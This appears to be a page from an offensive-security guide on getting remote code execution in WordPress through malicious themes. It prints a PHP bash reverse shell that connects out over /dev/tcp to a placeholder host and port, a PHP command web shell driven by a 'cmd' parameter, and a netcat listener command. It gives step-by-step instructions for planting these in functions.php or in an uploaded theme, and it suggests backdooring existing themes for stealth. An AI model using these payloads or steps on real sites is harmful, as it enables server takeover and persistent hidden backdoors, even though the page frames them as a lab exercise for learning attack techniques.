Malicious Theme

Uploading a Malicious Theme

WordPress Theme Exploitation (File Upload to RCE)

Another common attack vector in WordPress is the installation of a malicious theme. Unlike plugins, themes also allow the execution of arbitrary PHP code. If an attacker can upload a theme with a web shell or reverse shell payload inside, it can lead to full Remote Code Execution (RCE).

Theme Acquisition

The attacker prepares or downloads a malicious theme.

This theme can be a modified version of an existing theme.
Example: Injecting a reverse shell into functions.php or creating a shell.php inside the theme folder.

Payload example (reverse shell in functions.php):

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[ip-vm]/[port] 0>&1'");
?>

Upload & Execute Payload

Existing theme

Update theme functions.php:

Navigate to the WordPress admin panel. Dashboard > Tools > Theme File Editor

In the right side you can find the functions.php file

Choose your shell type ( cmd / reverse shell)

Option 1: Upload a PHP reverse shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[ip-vm]/[port] 0>&1'"); ?>

option 2: Upload a PHP cmd shell:

if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }

Browse to the location of fucntions.php

# In our lab case with cmd-shell
http://[ip-vm]/wordpress/wp-content/themes/twentytwentyfive/functions.php?cmd={command}

# In our lab case with shell
# Open listenr in your terminal and then browse to functions.php
nc -lnvp 1234
http://[ip-vm]/wordpress/wp-content/themes/twentytwentyfive/functions.php

💡 Please note:

It not have to be in functions.php , its can be in any .php file.
Before modifying the theme, make sure to visit the page you want to edit. otherwise, the shell won’t be triggered.

💡 Please note:

You can use my theme from this repository, its a cmd-shell based.
If you want to modify it just download the zip file and instead of this line (change it to this file)

if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }

New theme

Upload new theme:

Navigate to the WordPress admin panel. Dashboard > Appearance > Themes > Add Theme

Click on Upload Theme > Chose the file > Active

Enter your main page in the site

Modify the url for your command

http://[ip-vm]/wordpress/index.php?cmd=ls

Key Point

Exploiting themes is more stealthy than plugins since themes are expected to modify site behavior and contain arbitrary PHP code.
Attackers may backdoor an existing theme rather than upload a new one to stay hidden.
Theme PHP files (e.g., functions.php, header.php, footer.php) are executed.
Malicious code is executed as soon as theme is activated.

PreviousMalicious plugin NextMedia Library Upload Abuse

Last updated 3 months ago